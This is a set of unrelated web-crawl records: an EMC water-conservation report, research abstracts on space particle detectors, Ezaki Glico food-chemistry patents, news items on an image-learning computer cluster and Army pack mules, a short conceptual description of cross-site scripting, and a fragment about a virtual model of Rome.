Water is also an element of the risk assessment we conduct for our supply chain, which combines an internally-developed risk assessment with Electronic Industry Citizenship Coalition (EICC) tools. We work directly with our suppliers to evaluate risk factors and associated controls. To learn more, visit Supply Chain.
Water Conservation Efforts
EMC’s approach includes the use of various water efficiency and conservation features in our facilities worldwide, such as low-flow plumbing fixtures, rainwater capture systems, and free air cooling. We also consider water conservation and efficiency elements when designing and constructing new facilities. In 2015, our Global Energy & Water Management Steering Committee helped to focus regional efforts on water consumption and to expand water conservation programs across the globe. To learn more about the committee, visit Efficient Facilities.
At our headquarters in Hopkinton, Massachusetts and our Bangalore, India Center of Excellence (COE), wastewater is reclaimed at the onsite treatment plants, which filter wastewater through treatment and disinfection processes, resulting in treated “gray” water. In 2015, we reused more than 22,550 cubic meters of gray water for cooling, sanitation, and irrigation at the Hopkinton facility, and 41,644 cubic meters at the Bangalore COE facility. Unused gray water is returned to the ground through infiltration systems to replenish local watersheds.
|EMC Corporate Water Reuse
Massachusetts Facilities – Cubic Meters
At EMC’s Massachusetts campus facilities, we have implemented a stringent Stormwater Management System to help protect and maintain the integrity of the surrounding resources. At these facilities, we have also implemented an Integrated Pest Management program to minimize and eliminate the use of chemical herbicides, insecticides, and pesticides where possible. Through diligent management efforts, we ensure a high quality of storm water runoff from our facilities. This minimizes the impact of our operations on natural resources, including groundwater and surface water, and helps ensure that these resources are protected in the future.
EMC’s owned manufacturing process is not water intensive, and produces no industrial wastewater. In EMC’s operations, water is consumed through normal building systems use such as for cooling, drinking and other sanitary purposes. Since 2007, we have tracked water consumption data for all of our owned facilities and most of the larger facilities that we lease.
Our estimated total 2015 global water withdrawal was 1,180,736 cubic meters. Seventy two percent of the water withdrawal data were compiled from reliable water bills and water meter readings. The remaining annual corporate water consumption was estimated using a water intensity factor calculated by benchmarking consumption at metered EMC facilities.
|Global Water Withdrawal
All Leased and Owned Global Facilities (includes VMWare) – Cubic Meters (M³)
*Re-stated water consumption in previous years based on changes in square footage and availability of additional water invoices. Invoice availability in 2014 was actually 70%, rather than 75%, due to changes in portfolio square footage.
Energy – Water Nexus
We recognize that water, energy, and carbon emissions are interconnected. Water is required to generate and transmit the energy EMC consumes, and energy is used to supply the water we use. Our suppliers also use water in their operations to produce the material components in our products. Thoughtful water conservation and efficiency practices help save energy and reduce the carbon emissions generated from these activities.
We also understand that there can be trade-offs between water and carbon emissions. Water and energy are needed to power and cool our own offices and data centers, as well as those of our customers, and our wastewater treatment plant consumes energy, while reducing our water footprint.
We take a systematic view of energy and water use and the resulting carbon emissions, and focus on driving efficiencies in our products and operations. For example, applying free air cooling technology has allowed us to reduce the amount of energy and water consumed in our data centers and labs. | <urn:uuid:acc2ef00-59c7-4407-942c-b9103cc49a4b> | CC-MAIN-2017-04 | https://www.emc.com/corporate/sustainability/operations/water.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00065-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927426 | 1,124 | 2.546875 | 3 |
Valtonen E.,University of Turku |
Eronen T.,University of Turku |
Nenonen S.,Oxford Instruments |
Andersson H.,Oxford Instruments |
And 9 more authors.
Nuclear Instruments and Methods in Physics Research, Section A: Accelerators, Spectrometers, Detectors and Associated Equipment | Year: 2016
We have fabricated and tested a thin silicon detector with the specific goal of having a very good thickness uniformity. SOI technology was used in the detector fabrication. The detector was designed to be used as a ΔE detector in a silicon telescope for measuring solar energetic particles in space. The detector thickness was specified to be 20 μm with an rms thickness uniformity of±0.5%. The active area consists of three separate elements, a round centre area and two surrounding annular segments. A new method was developed for measuring the thickness uniformity based on a modified Fizeau interferometer. The thickness uniformity specification was well met with the measured rms thickness variation of 43 nm. The detector was electrically characterized by measuring the I-V and C-V curves and the performance was verified using a 241Am alpha source. © 2015 Elsevier B.V. All rights reserved. Source
Cyamukungu M.,Catholic University of Louvain |
Benck S.,Catholic University of Louvain |
Borisov S.,Catholic University of Louvain |
Gregoire G.,Catholic University of Louvain |
And 32 more authors.
IEEE Transactions on Nuclear Science | Year: 2014
This paper provides a detailed description of the Energetic Particle Telescope (EPT) accommodated on board the PROBA-V satellite launched on May 7th, 2013 on a LEO, 820 km altitude, 98.7 inclination and a 10:30-11:30 Local Time at Descending Node. The EPT is an ionizing particle spectrometer that was designed based on a new concept and the most advanced signal processing technologies: it performs in-flight electron and ion discrimination and classifies each detected particle in its corresponding physical channels from which the incident spectrum can be readily reconstructed. The detector measures electron fluxes in the energy range 0.5-20 MeV, proton fluxes in the energy range 9.5-300 MeV and He-ion fluxes between 38 and 1200 MeV. The EPT is a modular configurable instrument with customizable maximum energy, field of view angle, geometrical factor and angular resolution. Therefore, the features of the currently flying instrument may slightly differ from those described in past or future configurations. After a description of the instrument along with the data acquisition and analysis procedures, the first particle fluxes measured by the EPT will be shown and discussed. The web-site located at http://web.csr.ucl.ac.be/csr-web/probav/which daily displays measured fluxes and other related studies will also be briefly described. © 1963-2012 IEEE. Source
Kudina A.M.,Ukrainian Academy of Sciences |
Borodenkoa Y.A.,Ukrainian Academy of Sciences |
Grinyova B.V.,Ukrainian Academy of Sciences |
Didenkoa A.V.,Ukrainian Academy of Sciences |
And 9 more authors.
Instruments and Experimental Techniques | Year: 2010
CsI(Tl) crystal + Si photodiode scintillation assemblies have been designed to detect photons with energies of 60-1330 keV and protons with energies of 6-50 MeV. The spectrometric characteristics of the assemblies and their radiation hardness have been investigated. The assemblies are shown to have a high energy resolution: 19.6 and 4.6-5.0% for photons with energies of 59.6 and 662 keV and 3.9 and 1.5% for protons with energies of 10 and 20 MeV, respectively. The radiation hardness of these detectors is rather high: it corresponds to a dose of up to 103 Gy under photon irradiation and fluxes of up to 1012 protons/cm2 under exposure to protons. © 2010 Pleiades Publishing, Ltd. Source
Virtanen J.,Finnish Geospatial Research Institute |
Poikonen J.,Kovilta Oy |
Santti T.,Aboa Space Research Oy |
Komulainen T.,Aboa Space Research Oy |
And 10 more authors.
Advances in Space Research | Year: 2015
We describe a novel data-processing and analysis pipeline for optical observations of moving objects, either of natural (asteroids, meteors) or artificial origin (satellites, space debris). The monitoring of the space object populations requires reliable acquisition of observational data, to support the development and validation of population models and to build and maintain catalogues of orbital elements. The orbital catalogues are, in turn, needed for the assessment of close approaches (for asteroids, with the Earth; for satellites, with each other) and for the support of contingency situations or launches. For both types of populations, there is also increasing interest to detect fainter objects corresponding to the small end of the size distribution.The ESA-funded StreakDet (streak detection and astrometric reduction) activity has aimed at formulating and discussing suitable approaches for the detection and astrometric reduction of object trails, or streaks, in optical observations. Our two main focuses are objects in lower altitudes and space-based observations (i.e., high angular velocities), resulting in long (potentially curved) and faint streaks in the optical images. In particular, we concentrate on single-image (as compared to consecutive frames of the same field) and low-SNR detection of objects. Particular attention has been paid to the process of extraction of all necessary information from one image (segmentation), and subsequently, to efficient reduction of the extracted data (classification).We have developed an automated streak detection and processing pipeline and demonstrated its performance with an extensive database of semisynthetic images simulating streak observations both from ground-based and space-based observing platforms. The average processing time per image is about 13. s for a typical 2k-by-2k image. For long streaks (length >100 pixels), primary targets of the pipeline, the detection sensitivity (true positives) is about 90% for both scenarios for the bright streaks (SNR>1), while in the low-SNR regime, the sensitivity is still 50% at. SNR=0.5. © 2015 COSPAR. Source
Huovelin J.,University of Helsinki |
Vainio R.,University of Helsinki |
Andersson H.,Oxford Instruments |
Valtonen E.,Aboa Space Research Oy |
And 19 more authors.
Planetary and Space Science | Year: 2010
The Solar Intensity X-ray and particle Spectrometer (SIXS) on the BepiColombo Mercury Planetary Orbiter (MPO) will investigate the direct solar X-rays, and energetic protons and electrons which pass the Spacecraft on their way to the surface of Mercury. These measurements are vitally important for understanding quantitatively the processes that make Mercury's surface glow in X-rays, since all X-rays from Mercury are due to interactions of the surface with incoming highly energetic photons and space particles. The X-ray emission of Mercury's surface will be analysed to understand its structure and composition. SIXS data will also be utilised for studies of the solar X-ray corona, flares, solar energetic particles, and the magnetosphere of Mercury, and for providing information on solar eruptions to other BepiColombo instruments. SIXS consists of two detector subsystems. The X-ray detector system includes three identical GaAs PIN detectors which measure the solar spectrum at 1-20 keV energy range, and their combined field-of-view covers ∼1/4 of the whole sky. The particle detector system consists of an assembly including a cubic central CsI(Tl) scintillator detector with five of its six surfaces covered by a thin Si detector, which together perform low-resolution particle spectroscopy with a rough angular resolution over a field-of-view covering ∼1/4 of the whole sky. The energy range of detected particle spectra is 0.1-3 MeV for electrons and 1-30 MeV for protons. A major task for the SIXS instrument is the measurement of solar X-rays on the dayside of Mercury's surface to enable modeling of X-ray fluorescence and scattering on the planet's surface. Since highly energetic particles are expected to also induce a significant amount of X-ray emission via particle-induced X-ray emission (PIXE) and bremsstrahlung when they are absorbed by the solid surface of the planet Mercury, SIXS performs measurements of fluxes and spectra of protons and electrons. SIXS performs particle measurement at all orbital phases of the MPO as the particle radiation can occur also on the night side of Mercury. The energy ranges, resolutions, and timings of X-ray and particle measurements by SIXS have been adjusted to match with the requirements for interpretation of data from Mercury's surface, to be performed by utilising the data of the Mercury Imaging X-ray Spectrometer (MIXS), which will measure X-ray emission from the surface. © 2008 Elsevier Ltd. All rights reserved. Source | <urn:uuid:cde02bc8-427f-498e-8d45-8f6fe114277e> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/aboa-space-research-oy-1423457/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00488-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.888919 | 1,983 | 2.65625 | 3 |
Carnegie Mellon University has been running a computer cluster since July that scans the web for images in order to make sense out of them. The project, dubbed Never Ending Image Learner, could pave the way for computers that better understand the visual world in ways that humans often take for granted.
You can check out NEIL in action here, as I did to see what sense it had made of Batman pictures (it learned that the Joker can kind of look like Batman).
The project, funded by Google and the Office of Naval Research, runs on 2 clusters of computers comprising 200 cores that are building what researchers hope will be the world's largest visual knowledge base. They're building a database that makes connections between images to better understand them (such as that cars are typically found on roads and that pink doesn't necessarily refer to the singer of that name). NEIL has plowed through some 3 million images and has identified thousands of objects and scenes, and as a result, relationships.
The cluster isn't doing all the work on its own, as research Abhinav Shrivastava says humans might not always know what to teach computers but they "are good at telling computers when they are wrong."
It's not surprising that Google is putting funds behind this project given that image search is a focus for the company, which recently added search by image to its Chrome web browser. | <urn:uuid:7182ab55-1988-4107-bd14-b2dc6a38a3bb> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2225872/data-center/oh-no--now-even-computers-have-more-common-sense-than-me.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00358-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.979043 | 279 | 2.96875 | 3 |
Kometani T.,Ezaki Glico Co.
Pure and Applied Chemistry | Year: 2010
Recently, people have been paying greater attention to their health and, as a result, the need to use physiologically functional foods was found on the market. For these reasons, the market size of "foods for specified health use" (FOSHU) in Japan has grown and was approximately ¥700 billion in 2008. Many enzymes such as amylases and proteases have been used in food manufacturing because of their diversity, specificity, and mild condition in reaction. The aim of this investigation was the production of novel bioactive compounds by three kinds of transglycosylation reaction of the amylolytic enzymes, and the research and development of physiologically functional foods using these compounds. Phosphoryl oligosaccharides of calcium (POs-Ca) are a complex with Ca and phosphoryl oligosaccharides prepared from potato starch by a hydrolysis (transglycosylation to H2O) of amylolytic enzymes. The chewing gum included POs-Ca prevented dental caries in humans. Highly branched cyclic dextrin (HBCD) was produced from amylopectin by branching enzyme (intramolecular transglycosylation), which had a relatively narrow molecular-weight distribution compared with commercially available dextrins. The sports drink containing HBCD enhanced swimming endurance in mice and humans. α-Glycosylhesperidin (G-Hsp) was produced from starch and hesperidin, a flavonoid found abundantly in citrus fruits, by the intermolecular transglycosylation using cyclodextrin glucanotransferase. Oral administration of G-Hsp improved rheumatoid arthritis in mice and humans, and poor blood circulation in women. In this study, we looked to prove that this enzymatic modification technique was useful in creating unique and effective physiologically functional foods. These functional foods are expected to improve the health and quality of life of many people. © 2010 IUPAC. Source
Sanwa Cornstarch Co. and Ezaki Glico Co. | Date: 2012-12-13
A disintegrant for tablets includes an -1,4-glucan having a degree of polymerization of not less than 180 and less than 1230 and a dispersity (weight average molecular weight Mw/number average molecular weight Mn) of not more than 1.25 or a modified product thereof. A binder for tablets includes an -1,4-glucan having a degree of polymerization of not less than 1230 and not more than 37000 and a dispersity of not more than 1.25, or a modified product thereof. A binding-disintegrating agent for tablets includes a low molecular weight -1,4-glucan or a modified product thereof, and a high molecular weight -1,4-glucan or a modified product thereof.
Omikenshi Co., Kanto Natural Gas Development Co. and Ezaki Glico Co. | Date: 2010-06-17
A method for producing an amylose-containing rayon fiber, comprising the steps of: mixing an aqueous alkaline solution of amylose with viscose to obtain a mixed liquid, spinning the mixed liquid to obtain an amylose-containing rayon fiber, and bringing the amylose-containing rayon fiber into contact with iodine or polyiodide ions, thereby allowing an amylose in the amylose-containing rayon fiber to make a clathrate including the iodine or polyiodide ions, wherein the amylose is an enzymatically synthesized amylose having a weight average molecular weight of 310
Ezaki Glico Co. and Glico Nutrition Co. | Date: 2012-12-25
Provided is a preparation method for phycocyanin, including: adding chitosan to a suspension of cyanobacteria containing phycocyanin; and filtering the suspension.
Ezaki Glico Co. | Date: 2013-09-25
Provided is an external preparation for skin, comprising a phosphorylated saccharide. The phosphorylated saccharide may be an inorganic salt of a phosphorylated saccharide. The phosphorylated saccharide may be a calcium, magnesium, potassium, zinc, iron or sodium salt. Also provided is an external preparation for skin, comprising a phosphorylated saccharide and a second component, wherein the second component is selected from the group consisting of moisturizing agents, whitening components, ultraviolet absorbents, anti-inflammatory agents, cell-activating agents and antioxidants. The moisturizing agent may be ascorbic acid or an ascorbic acid derivative. | <urn:uuid:742b76de-1246-4ad4-8c91-01eb507d7d65> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/ezaki-glico-co-37120/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.912768 | 1,012 | 2.578125 | 3 |
Army could ditch robots for mules
- By Michael Hardy
- May 27, 2011
There are times when technology meets a limit and an old way of doing things turns out to still be the best. The Army is beginning to think that an effort to use robots for hauling supplies across mountainous terrain might become one of those times, at least for now. The robots aren't doing well in testing, and the Army is considering bringing back an older technology: the pack mule.
The Army is even considering reviving a 19th-century component, the Animal Corps, to care for the animals, said Jim Overholt, senior research scientist for robotics at the Army Tank Automotive Research, Development and Engineering Center, in a report in the blog National Defense.
According to that post, by Stew Magnuson, high-level Army and Defense Department officials are considering the revival of the Animal Corps based on comments Overholt made while speaking at a a robotics conference sponsored by the National Defense Industrial Association — publisher of National Defense — and the Association for Unmanned Vehicle Systems International.
"Overholt suggested that the talk of bringing mules back to the battlefield is derived from the frustration Army leaders feel that the leader-follower robotics technology is not ready to be fielded while there is an acute need to lighten troops' loads," Magnuson writes.
There have been several research efforts to develop robots to carry supplies and accompany soldiers in the field, most notably one called BigDog funded by the Defense Advanced Research Projects Agency, Magnuson adds. Thus far, none of them have succeeded.
Now the return to animals is a real possibility, writes David Axe at Wired's "Danger Room" blog.
"If everything works out, the future Army could look a lot like the Army of the 19th century, with trains of braying, kicking mules trailing behind the foot soldiers as they stomp through fields, slog through streams and wheeze up steep hillsides," Axe writes. "As in the Army of the 1800s, teams of specially trained veterinarians and animal-handlers would ensure the combat mules stayed battle-ready."
Technology journalist Michael Hardy is a former FCW editor. | <urn:uuid:47574be6-5f05-48ba-980a-0ebfff0e2d77> | CC-MAIN-2017-04 | https://fcw.com/articles/2011/05/27/army-ditch-robots-pack-mules.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954862 | 451 | 2.6875 | 3 |
Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, web board, email, or from an instant message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website.
Download the paper in TXT format here. | <urn:uuid:0263effe-f594-4fd9-9265-5a41de25ca25> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2002/11/06/the-cross-site-scripting-faq/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00294-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93427 | 156 | 3.578125 | 4 |
Archive for August, 2010
For success designing and implementing Cisco Wireless solutions, a CCNA Wireless student needs to be familiar with the options for various wireless topologies. Two were defined by the 802.11 committees, while others were made possible thanks to excellent developments by wireless vendors like Cisco Systems.
The 802.11 Topologies
Ad Hoc Mode
While not popular, it is possible to have wireless devices communicate directly with no central device managing the communications. This is called the Ad Hoc network topology and is one of the two topologies defined by the 802.11 committees. In the Ad Hoc type topology, one device sets a group name and radio parameters, and another device uses this information to connect to the wireless network.
This type of wireless network topology is referred to as an Independent Basic Service Set (IBSS). This is easy to remember as we know the devices are working independently of an access point (AP).
Network Infrastructure Mode
When an access point is used to create the network, the official term is network infrastructure mode for the network. There is a Basic Service Set (BSS) setup that uses a single access point, or the Extended Service Set (ESS) that uses multiple access points in order to extend the reach of the wireless network.
One of the frequent questions I hear regarding L3VPNs, is regarding the bottom VPN label. In this article, we will focus on the control plane that provides both the VPN and transit labels, and then look at the data plane that results because of those labels.
In the topology, there are 2 customer sites (bottom right, and bottom left). The BGP, VRFs, Redistribution, etc are all configured to allow us to focus on the control and data plane. Lets begin by verifying that R1 is sourcing the network, 184.108.40.206/32.
A debug verifies that R1 is sending the updates for 220.127.116.11 to R2.
In this blog post we’re going to discuss the fundamental logic of how MPLS tunnels allow applications such as L2VPN & L3VPN to work, and how MPLS tunnels enable Service Providers to run what is known as the “BGP Free Core”. In a nutshell, MPLS tunnels allow traffic to transit over devices that have no knowledge of the traffic’s final destination, similar to how GRE tunnels and site-to-site IPsec VPN tunnels work. To accomplish this, MPLS tunnels use a combination of IGP learned information, BGP learned information, and MPLS labels.
We wanted to provide our students with advance notification of some upcoming online classes here at INE. While we hope to see many students in the actual live events, on-demand versions will indeed be made available the week following the live, online version.
September 13 – 17th, 2010 CCNA Wireless 5-Day Bootcamp
September 15 – 17th, 2010 Security for CCIE R&S Candidates 3-Day Bootcamp
September 29 – Oct 1, 2010 IPv4/IPv6 Multicast 3-Day Bootcamp
October 4 – 9th, 2010 Online 6-Day CCIE R&S Bootcamp with K. Barker and A. Sequeira
Our BGP class is coming up! This class is for learners who are pursuing the CCIP track, or simply want to really master BGP. I have been working through the slides, examples and demos that we’ll use in class, and it is going to be excellent. If you can’t make the live event, we are recording it, so it will be available as a class on demand, after the live event. More information, can be found by clicking here.
One of the common questions that comes up is “Why does the router choose THAT route?
We all know, (or at least after reading the list below, we will know), that BGP uses the following order, to determine the “best” path.
So now for the question. Take a look at the partial output of the show command below: Continue Reading
For each new CCIE Testimonial we are extending the seven years of success sale! Share your INE success story and congratulations to the following new CCIE Testimonials who have extended the sale thus far!
Thomas Fischer, CCIE #26636 – Routing & Switching
I am proud to let you know, that I passed my CCIE R&S Lab in Brussels on Aug. 5th. This was my second attempt. I want to express my deepest appreciation for your Products. I am a self-paced student, using Vol1 (*****), Vol2 (****) and Vol4 (***). Thanks INE, it feels so good to have a social life again )
Matthew Ayre, CCIE #26654 – Service Provider
Big shout out for INE and their OEQ / lab preparation resources! I just cleared service provider on second attempt finishing about an hour and a half early. Was ~7% of passing the first time using INE 1 & 2 as my primary material then just drilled down on the finer details reading theory. The workbooks really developed the speed and confidence required to beat the exam!
Prateek Madaan, CCIE #26772 – Security
Had been a long and tough journey. Would really like to thank INE from the Core of my heart for facilitating in imparting the skills required not to just pass the exam but to DESERVE it as well…
There are many workbooks available which I prepared along with INE , do not want to name or list any one of them…or make any comparisons…But in comparisons INEs Security Workbooks may sound tough as compared to others BUT once you go through these workbooks is when you actually feel DESERVED the tag rather than just passing it.. Each of these workbooks and the tasks test each and every technology in detail and till the dead end….
In my last attempt on Version 2 I was deprived of the number by 1%, still followed and trusted INE workbooks and finally it helped….Today I am more happy not to procure the number but to actually have the feeling of confidence that ‘YES this time I deserve to be a CCIE’ and all due to the exhaustive INE workbooks….
Olusegun Olurotimi Medeyinlo, CCIE #26683 – Routing & Switching
I the Passed the CCIE R&S lab in Brussels on my Second attempt. I’d like to thank the instructors at INE for their excellent workbooks and blogs. Special thanks to Keith Barker for his encouragement and advice.
Now, I have my own CCIE number #22683.
Congratulations to everyone who passed the CCIE Lab Exam. Our instructors, authors, and staff have been committed to helping you pass your exam for the past seven years and we will continue to make your exam our number one priority. Only at INE.
Many businesses globally – large and small alike – have been converting calls from routing over traditional PSTN carrier trunks – such as E1 & T1 PRI or CAS – to much lower cost, yet still high performance, SIP ITSP (Internet Telephony Service Provider) trunks for years now. INE is no different than your business with regard to this – we have been using SIP trunks in lieu some traditional PSTN calling for years now as well. In fact, in response to a US Federal Communications Commission sub-commitee’s exploration on “PSTN Evolution” in December 2009, a representative from the US carrier AT&T described the traditional circuit-switched PSTN as “relics of a by-gone era”, and said that “Due to technological advances, changes in consumer preference, and market forces, the question is when, not if, POTS service and the PSTN over which it is provided will become obsolete” – source: Reuters [emphasis mine].
The challenge however, becomes that every SIP ITSP carrier has a slightly different way of implementing these sorts of trunks, and each has different provider network equipment that you, the customer, must connect to, and interoperate (properly) with. If you are a large national or multinational business, you may for instance sometimes even connect to two or three different types of provider network equipment, between possibly having multiple contracts with multiple carriers, and even sometimes having to deal with different provider equipment within a single carrier’s network.
As you may have noticed, INE does a wide variety of training in the Cisco space. This blog post goes out to all those folks who have recently begun their Cisco training.
This month we delivered new live classes on CCNA and CCNP. We are excited for and encourage our students at every level in their journey. In that light, we have gathered a collection of Videos Answers, targeted at the CCNA level, with a few topics leaking into security and CCNP. These videos were primarily created as quick (under 10 minutes each) Video Answers to questions that various learners have had.
Take a look at the list of topics, and if there are 1 or 2 you feel you would benefit from, feel free to enjoy them.
Here are a few of the topics (in no particular order):
- How the network statement really works in IOS
- Setting up SSH
- Initial commands for sanity sake
- NAT with overload
- Router on a stick
- VRFs Continue Reading
In this blog post we are going to review a number of MPLS scaling techniques. Theoretically, the main factors that limit MPLS network growth are:
- IGP Scaling. Route Summarization, which is the core procedure for scaling of all commonly used IGPs does not work well with MPLS LSPs. We’ll discuss the reasons for this and see what solutions are available to deploy MPLS in presence of IGP route summarization.
- Forwarding State growth. Deploying MPLE TE may be challenging in large network as number of tunnels grow like O(N^2) where N is the number of TE endpoints (typically the number of PE routers). While most of the networks are not even near the breaking point, we are still going to review techniques that allow MPLS-TE to scale to very large networks (10th of thousands routers).
- Management Overhead. MPLS requires additional control plane components and therefore is more difficult to manage compared to classic IP networks. This becomes more complicated with the network growth.
The blog post summarizes some recently developed approaches that address the first two of the above mentioned issues. Before we begin, I would like to thank Daniel Ginsburg for introducing me to this topic back in 2007.
Last week we wrapped up the MPLS bootcamp, and it was a blast! A big shout out to all the students who attended, as well as to many of the INE staff who stopped by (you know who you are ). Thank you all.
Here is the topology we used for the class, as we built the network, step by step.
The class was organized and delivered in 30 specific lessons. Here is the “overview” slide from class: Continue Reading | <urn:uuid:04591534-0658-4ead-9103-7c8390b0d873> | CC-MAIN-2017-04 | http://blog.ine.com/2010/08/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00020-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936619 | 2,348 | 2.796875 | 3 |
One question that is often asked is how exactly does Infinity determine what is a threat. And I usually have two answers ready, the first one being “magic” (it’s not really magic, but gives me an excuse to wave my hands around), and the second one is “how much time do you have?”
The concept for Infinity and its mathematical underpinnings draw heavily from the field of artificial intelligence, and in particular the subfield of machine learning. The overall principles of machine learning are relatively easy to grasp. Consider the case where you want to train a machine to distinguish between photos of cats and dogs. First, you provide the machine with pictures of cats, and inform the machine that these are in fact photos of cats. Then, you provide a second group of pictures of dogs, and inform the machine that these are dog photos. Ideally, once the machine has seen photos of cats and dogs, it should then be able to look at new photos and determine if the photo is of a cat or dog.
While simplistic from a high level, there are an enormous amount of variables that influence the effectiveness of machine learning techniques to solve problems. For example, how does the machine process data? And how much data is enough? How long does it take to process all of the data? These (among many other issues) are nontrivial points that we had to consider when architecting Infinity. To provide further insight into how Infinity learns to detect malware, let’s dive into some of these challenges.
In the case of a machine learning system designed to determine if a photo is of a cat or dog, one critical step that must be resolved is how does one represent a photo to a learning system. One simple approach would be to inform the learning system of the color of every pixel in the image. While this would provide data for a learning system, one could possibly imagine more informative representations of the data. Perhaps we could extract different shapes from the photo, or find locations of eyes or tails, or many other interesting features.
This type of data extraction from raw data is commonly referred to as feature extraction in machine learning nomenclature, and is a part of our Infinity pipeline. Machine learning systems rely heavily on proper feature extraction of data. One familiar axiom of machine learning is “garbage in, garbage out” - meaning if your data representation is poor, then your machine learning system will perform poorly. One could imagine in the example of cat and dog photos, what representation may fall on the side of poor representation, and what may fall on the side of rich representation.
Of course, in our case, instead of dealing with photos of cats and dogs, we deal with malicious and non-malicious files. To determine what we want to extract from files, we have leveraged the expertise of our reverse engineers and data scientists to develop a feature extraction component of Infinity that provides an incredibly rich representation of data for Infinity to digest. In terms of raw data, Infinity can extract well over 1 million different data points that are used to define a sample file. While a human analyst would look at 1 million data points and simply be unable to deal with the volume of information, Infinity is well equipped to handle enormous representations of data. This well designed feature extraction component of Infinity forms the basis of what we feed as training data to our machine learning system.
Another issue that is often discussed in machine learning is exactly how much data is ideal for a learning system to train on before it is considered mature enough to start making decisions. And whatever the determined amount of data is, typically there is a better answer, and that answer is “more”. With that in mind, we designed Infinity to be able to constantly bring in new data. In fact, Infinity can bring in well over 3 million samples a day, and can easily scale to handle considerably larger amounts of data. This constant stream of new data not only provides Infinity with more data to learn from, actively improving the ability of Infinity to detect threats - it also allows Infinity to identify new trends and anomalies occurring in the real world at a real-time pace.
Now that we have an idea of the volume of data Infinity can handle on a day-to-day basis, another important component of Infinity is how does the machine learning component process huge volumes of data to develop the mathematical models used to identify malware? For those not familiar with the implementation details of machine learning algorithms, many of these techniques require computationally expensive operations. Consider the case where we want to have a machine learning component train on 3 million samples. Consider that each sample generates 1 million data points, and say for the sake of simplicity each datapoint is represented by one byte. If we were to construct a matrix containing this data, the matrix itself would be 3,000,000,000,000 bytes (3 TB) of data. And that is just the representation of the data. One also has to factor in the mathematics required to construct models, and one could easily see the need for a total number of calculation on the order of 10,000,000,000,000,000+ (more than ten QUADRILLION). To put this into perspective, the world’s leading supercomputers are measured in terms of petaFLOPS, which are a measure of how many quadrillions of floating point operations can be executed per second.
In order to deal with the large amount of data and required CPU cycles needed to build effective machine learning models, we architected Infinity from the ground up with heavy parallelization at its core. This allows us to easily run enormous calculations quickly and effectively over hundreds to thousands of machines at once, providing tremendous value to our ability to train and evaluate new machine learning models.
Designing Infinity with these three considerations in mind has allowed us to develop a world-class machine learning infrastructure. And as Infinity continues to grow and learn and improve, our underlying architecture provides the means to continue to scale to meet the demands of ever expanding data. Now we can revisit the original question in this context: How does Infinity determine what is a threat? Infinity has learned by processing massive amounts of malicious and non-malicious data, more data than any human could possibly ever examine on their own. And armed with this extensive knowledge of what is malicious and non-malicious, it can quite easily examine the characteristics of a single file and, ultimately, extrapolate if that single file has malicious intentions.
We're just getting started, stay tuned for more.
- The Cylance Infinity Team | <urn:uuid:caea47d9-56f5-4be7-8655-b09b38e86d21> | CC-MAIN-2017-04 | https://blog.cylance.com/feeding-infinity | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00322-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943906 | 1,342 | 2.84375 | 3 |
These questions are based on: 220-601 – A+ Essentials CompTIA Self-Test Software Practice Test.
SubObjective: Identify tools, diagnostics procedures and troubleshooting techniques for networks
Single Answer, Multiple Choice
You are the desktop engineer for your company. A user named John reports he cannot connect his computer to the office Ethernet local area network (LAN). To troubleshoot the problem, you check that the network cable is attached properly from both ends, port and computer’s end. The network cable is found to be connected properly
What should you do next?
- Check whether the link light on the network adapter card (NIC) is on.
- Check whether the NIC is seated properly.
- Check whether the installed NIC is compatible with the computer.
- Check whether the correct driver for the NIC is installed on the computer.
A. Check whether the link light on the network adapter card (NIC) is on.
You should check whether the link light on the NIC is on. Before performing any major troubleshooting steps, you must check whether the link light on the NIC is on. If the link light is on, it indicates that the connection between the NIC and the network exists. If the link light is off, it indicates that there is either a problem with the cable or with the NIC.
After checking the link light status, you can perform other troubleshooting steps, such as check whether the NIC is seated on the motherboard slot properly or whether the NIC is compatible with the computer. You also can check for whether the correct driver for the NIC is installed.
Zapper Software, Help, PC Troubleshooting, Network Interface Card, http://www.zappersoftware.com/Help/how-to-troubleshoot-nic.html | <urn:uuid:5c7fb98c-7e7c-4f7c-b8dd-39722650c82b> | CC-MAIN-2017-04 | http://certmag.com/networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00534-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.841482 | 374 | 2.734375 | 3 |
3-D Rome in 21 Hours
There's an old adage that says "Rome was not built in a day," but a team of researchers at the University of Washington's Graphics and Imaging Laboratory (GRAIL) recently created a virtual Rome in 21 hours using 150,000 panoramic images from the popular user-generated Web site, Flickr.
